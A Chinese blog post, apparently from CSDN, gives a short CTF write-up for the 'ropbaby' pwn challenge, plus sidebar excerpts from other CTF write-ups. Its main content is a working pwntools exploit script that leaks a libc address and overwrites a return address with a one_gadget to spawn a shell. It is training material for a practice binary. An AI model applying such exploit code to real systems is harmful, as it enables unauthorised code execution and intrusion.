1.实验吧_ropbaby(西普杯CTF)_onegadget

最新推荐文章于 2022-10-29 12:13:06 发布
最新推荐文章于 2022-10-29 12:13:06 发布
阅读量478 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 赛事复现 文章标签: ropbaby one_gadget
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42037374/article/details/90576476
博客主要围绕ROP漏洞展开分析。首先查看文件位数和安全机制,接着查看strings及调用函数,尤其关注常见函数,找出漏洞点,最后涉及EXP编写。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • 分析
    1.先查看文件位数,安全机制
    2.查看strings,调用函数(特别注意常见的函数)
  • 漏洞点
    在这里插入图片描述在这里插入图片描述
  • EXP
from pwn import *
context.log_level = "debug"

p = process('./ropbaby')

p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
a=p.recvline()
libc = a.split(': ')[-1]
lib=int(libc,16) - 0x45390
log.success('libc : %#x',lib)
onegadget =0x45216+lib

p.recvuntil(': ')
p.sendline('3')
p.recvuntil('(max 1024): ')
p.sendline('17')
p.sendline('a'*8 + p64(onegadget))
p.recvuntil(': ')  
p.sendline('4')  #让题目正常退出
p.interactive()
Jc^
关注
专栏目录
18.10.9 实验吧----分道扬镳
qq_42192672的博客
10-08 538
都说大晚上做题有助于睡眠 提示:注意进入正确的流程,用最短的步骤走完迷宫。 我就不信这不是迷宫题………… 是个比较和善的exe,直接先找在IDA里找迷宫,可以看见的是这个迷宫貌似不是一个平面地图,我只看到了疑似的一行字符串,比有玄机,如下 分析main函数 第一步 走的步数应该是22步,即我们输入的字符串长度也是22 第二步 '上下左右'为:k\j\h\l,具体哪个...
实验CTF逆向题目easycreakme题解
iqiqiya的博客
12-24 3581
实验吧看到这道题 题目链接 http://ctf5.shiyanbar.com/reverse/easycreakme/Easy_CrackMe.exe.bak   我是直接用的脱壳后的 https://pan.baidu.com/s/1qYLZaXm      IDA载入很清楚的可以发现先后与a,5y,R3versing,E进行比较 若都
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
实验吧_ROPBABY
weixin_44681716的博客
05-04 453
实验目的 用过这次实验去检验我们前期对栈溢出的掌握程度 实验文件 链接:https://pan.baidu.com/s/14fPpj6nULpywKwMv21r7rA 提取码:qbp9 实验步骤 首先检验ropbaby的保护机制 发现栈是no canary found,我们可以进行栈溢出。 首先对文件进行静态分析 ...
buuctf [BJDCTF 2nd]one_gadget
carol2358的博客
04-18 647
libc可以在buuctf上下载。本题会泄漏printf的地址 14位,所以不用u64,u64用在6个字节的字符串上,改用int int - int oneone_gadget libc找,通过调试运行到call rdx,然后x/gx rdx的地址之类的,来确定里面的值 也可以不用info直接看到 发现最后一个是可行的 exp: from pwn import * from L...
CTF-Pwn-[BJDCTF 2nd]one_gadget
归子莫的博客
05-06 1767
CTF-Pwn-[BJDCTF 2nd]one_gadget 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]one_gadget 下载题目的文件 one_gadget...
中国民航大学第四届“西普”信息安全竞赛-题目源程序和Writeup.zip
最新发布
10-23
中国民航大学第四届“西普”信息安全竞赛-题目源程序和Writeup.zip
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
西安西普_STR说明书V4.8
03-19
根据提供的文件信息,可以推断该文件是一份关于软启动器的使用说明书,版本为V4.8,具体厂家为西安西普。软启动器是一种用于电动机启动控制的电气设备,主要功能是降低电动机启动时的电流冲击,保护电动机和相关机械...
西普部分CTF题目(web)(持续更新)
技术学习人生
08-16 9441
1、菊花 题目地址:http://www.simplexue.com/ctf/examctfdetail/729 点击“我是吊死”进入sim.php页面,post参数为id=,提示需要net framework 9.9 用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下面的注入均在这个条件下进行 id=1 提示hacker:w
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
小工具 在进行ctf pwn挑战时,我们通常需要一个小工具RCE(远程代码执行),这会导致调用execve('/bin/sh', NULL, NULL) 。 这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face: 安装 在RubyGems.org上可用! $ gem install one_gadget 注意:需要ruby版本> = 2.1.0,可以使用ruby --version进行检查。 支持的架构 i386 amd64(x86-64) a
shiyanbar-ropbaby
qq_35661990的博客
11-28 340
之前去成都“参观”天府导致感冒,颓废了好几天。。 先看一下文件类型和程序保护 开了NX和PIE,栈不可执行和地址随机化,看来不能用shellcode了,就像题目提示的用ROP。(FORTIFY说是会对栈溢出进行保护,但是这里感觉没有体现出来) __int64 __fastcall main(__int64 a1, char **a2, char **a3) { signed in...
CTF】32位/64位dlresolve最全总结(无地址泄露执行one_gadget
panhewu9919的博客
09-05 2280
利用dl_resolve执行libc内任意gadget(不需泄露libc地址) 实验代码下载地址:https://github.com/bsauce/CTF/tree/master/dl_resolve_64 分析:0CTF的题目blackhole2,很简单的栈溢出,但是远程不允许回显,所以不能泄露libc_base,不能返回shell。程序本身所含有的gadget有限,所以能不能不泄露libc_...
BJDCTF_ one_gadget
weixin_44864859的博客
04-09 391
考察点:one_gadget 题目给出了 printf 的地址,由此可算得 libc 基址,然后找 one_gadget、计算 libc 中 one_gadget 地址 printf("Give me your one gadget:"); __isoc99_scanf("%ld", &v4); v5 = v4; v4(); v4 是个函数指针,scanf 的时候把 on...
BUUCTF one_gadget
Sakura给爷pwn全场
02-21 468
https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/ng8arh
D^3CTF babyrop 经验总结
qq_43189757的博客
11-29 684
思路: 调试时发现在栈中有一个libc_start_main的地址 可以根据这个地址算出距one_gadget 的偏移 得到这个偏移后再让libc_start_main这个地址加上这个偏移即可得到one_gaget的地址, 之后再用这个地址覆盖ret即可getshell, 需要注意的是要满足one_gadget的约束条件, 我选则的是偏移为0x4526a 处的one_gadget, 所以需要保...
ctf【[OGeek2019]babyrop】
HUANGliang_的博客
10-29 348
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
[BUUCTF]PWN15——[BJDCTF 2nd]one_gadget
mcmuyanga的博客
08-30 499
[BUUCTF]PWN15——[BJDCTF 2nd]one_gadget 附件 步骤: 例行检查,64位,保护全开 nc试运行一下程序,看看情况,它一开始给了我们一个地址,然后让我们输入one gadget的地址 64位ida载入,shift+f12查看字符串,根据nc看到的字符串,找到关键函数 题目一开始输出的是printf函数的地址,题目一开始给了libc,知道了它的内存地址,就能够算出程序的偏移量了 print_addr=0x7fbe7e114830 offset=print_addr-li
CTF】bjdctf_2020_babyrop
凉水的博客
06-18 857
bjdctf_2020_babyrop
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值